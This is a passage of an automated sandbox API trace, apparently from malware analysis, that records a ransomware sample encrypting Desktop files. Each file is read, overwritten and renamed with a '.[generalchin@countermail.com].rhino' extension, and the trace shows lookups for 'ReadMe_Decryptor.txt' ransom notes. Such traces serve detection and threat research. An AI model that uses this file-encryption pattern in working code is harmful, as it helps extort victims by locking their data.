hHeap=0x6d0000) returned 1 [0082.777] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0082.777] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0082.777] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x717898 [0082.777] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0082.777] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x718200 [0082.777] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717898 | out: hHeap=0x6d0000) returned 1 [0082.777] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6ee498 [0082.778] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718200 | out: hHeap=0x6d0000) returned 1 [0082.778] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x6ef9d8 [0082.778] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0082.778] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x7524a8 [0082.778] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef9d8 | out: hHeap=0x6d0000) returned 1 [0082.778] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x755440 [0082.778] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7524a8 | out: hHeap=0x6d0000) returned 1 [0082.778] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x2230048 [0082.778] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x755440 | out: hHeap=0x6d0000) returned 1 [0082.780] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x2236b28 [0082.782] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2230048 | out: hHeap=0x6d0000) returned 1 [0082.782] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x2240b58 [0082.783] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2236b28 | out: hHeap=0x6d0000) returned 1 [0082.783] WriteFile (in: hFile=0x124, lpBuffer=0x2240b60*, nNumberOfBytesToWrite=0xd8c5, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x2240b60*, lpNumberOfBytesWritten=0x4af2ac*=0xd8c5, lpOverlapped=0x0) returned 1 [0082.784] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2240b58 | out: hHeap=0x6d0000) returned 1 [0082.784] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xd8c5, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0082.784] CloseHandle (hObject=0x124) returned 1 [0082.785] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x6f36d0 [0082.785] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x703e78 [0082.785] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0082.785] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS\\rGrQROZjIWQS_w.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wp8tbojwts\\rgrqrozjiwqs_w.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS\\rGrQROZjIWQS_w.mp4.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wp8tbojwts\\rgrqrozjiwqs_w.mp4.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0082.786] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0082.786] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0082.786] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0082.786] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fac68 [0082.786] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fabf0 | out: hHeap=0x6d0000) returned 1 [0082.786] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fabf0 [0082.786] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa6) returned 0x6f36d0 [0082.787] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fabf0 | out: hHeap=0x6d0000) returned 1 [0082.787] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wP8TBOjWTS\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wp8tbojwts\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.787] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0082.787] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wzj4_bQk.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzj4_bqk.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0082.787] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x954c [0082.787] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x966c, nNumberOfBytesToLockHigh=0x0) returned 1 [0082.787] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.787] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0082.789] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.789] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x954c, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x954c, lpOverlapped=0x0) returned 1 [0082.790] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0082.790] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0082.790] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0082.790] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0082.790] GetLastError () returned 0x0 [0082.790] SetLastError (dwErrCode=0x0) [0082.790] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0082.790] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x956f) returned 0x744cd8 [0082.790] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0082.790] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0082.790] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0082.790] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0082.790] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.790] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0082.790] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0082.791] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0082.791] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0082.791] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0082.791] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0082.791] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0082.791] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0082.791] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0082.791] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714188 [0082.791] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0082.791] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714170 [0082.791] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0082.791] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0082.791] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0082.791] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0082.791] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0082.791] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0082.791] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0082.791] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0082.791] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0082.791] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0082.791] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0082.792] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0082.792] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0082.792] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0082.792] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0082.792] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0083.126] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0083.126] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0083.126] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0083.126] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0083.126] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0083.127] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0083.127] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0083.127] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0083.127] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0083.127] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x717898 [0083.129] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0083.129] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x718200 [0083.129] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717898 | out: hHeap=0x6d0000) returned 1 [0083.129] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6ee498 [0083.130] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718200 | out: hHeap=0x6d0000) returned 1 [0083.130] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x6ef9d8 [0083.130] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0083.130] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x74e250 [0083.130] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef9d8 | out: hHeap=0x6d0000) returned 1 [0083.130] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x7511e8 [0083.130] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74e250 | out: hHeap=0x6d0000) returned 1 [0083.130] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x2230048 [0083.130] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7511e8 | out: hHeap=0x6d0000) returned 1 [0083.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x74e250 [0083.134] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2230048 | out: hHeap=0x6d0000) returned 1 [0083.135] WriteFile (in: hFile=0x124, lpBuffer=0x74e260*, nNumberOfBytesToWrite=0x966c, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x74e260*, lpNumberOfBytesWritten=0x4af2ac*=0x966c, lpOverlapped=0x0) returned 1 [0083.135] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74e250 | out: hHeap=0x6d0000) returned 1 [0083.137] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x966c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0083.138] CloseHandle (hObject=0x124) returned 1 [0083.140] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fabf0 [0083.141] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9730 [0083.141] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fabf0 | out: hHeap=0x6d0000) returned 1 [0083.141] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wzj4_bQk.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzj4_bqk.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wzj4_bQk.mkv.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzj4_bqk.mkv.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0083.142] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9730 | out: hHeap=0x6d0000) returned 1 [0083.142] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0083.142] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0083.142] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0083.142] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fac68 | out: hHeap=0x6d0000) returned 1 [0083.142] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0083.143] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0083.143] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0083.143] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.143] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0083.143] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WZnm.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wznm.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0083.143] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x8a5 [0083.143] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x9c5, nNumberOfBytesToLockHigh=0x0) returned 1 [0083.143] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.143] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0083.145] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.145] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x8a5, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x8a5, lpOverlapped=0x0) returned 1 [0083.146] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0083.146] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0083.146] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0083.146] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0083.146] GetLastError () returned 0x0 [0083.146] SetLastError (dwErrCode=0x0) [0083.146] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0083.146] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8a5) returned 0x717898 [0083.147] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0083.147] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0083.147] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0083.147] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0083.147] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.147] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0083.147] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0083.147] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0083.147] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0083.147] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0083.147] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0083.147] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0083.147] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0083.147] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0083.147] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714170 [0083.147] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0083.147] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714188 [0083.147] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0083.148] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0083.148] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0083.148] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0083.148] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0083.148] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0083.148] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0083.148] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0083.148] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0083.148] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0083.148] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0083.148] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0083.148] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0083.148] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0083.148] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0083.148] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0083.148] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0083.148] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0083.148] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0083.148] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0083.148] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0083.148] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0083.149] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0083.149] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0083.149] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0083.149] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x718148 [0083.149] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0083.149] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x718ab0 [0083.149] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718148 | out: hHeap=0x6d0000) returned 1 [0083.149] WriteFile (in: hFile=0x124, lpBuffer=0x718ab0*, nNumberOfBytesToWrite=0x9c5, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x718ab0*, lpNumberOfBytesWritten=0x4af2ac*=0x9c5, lpOverlapped=0x0) returned 1 [0083.149] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718ab0 | out: hHeap=0x6d0000) returned 1 [0083.149] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x9c5, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0083.149] CloseHandle (hObject=0x124) returned 1 [0083.150] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6f36d0 [0083.150] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9730 [0083.150] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0083.150] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WZnm.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wznm.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WZnm.odp.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wznm.odp.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0083.152] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9730 | out: hHeap=0x6d0000) returned 1 [0083.152] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0083.152] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717898 | out: hHeap=0x6d0000) returned 1 [0083.152] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0083.152] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0083.152] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0083.152] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0083.152] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0083.152] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 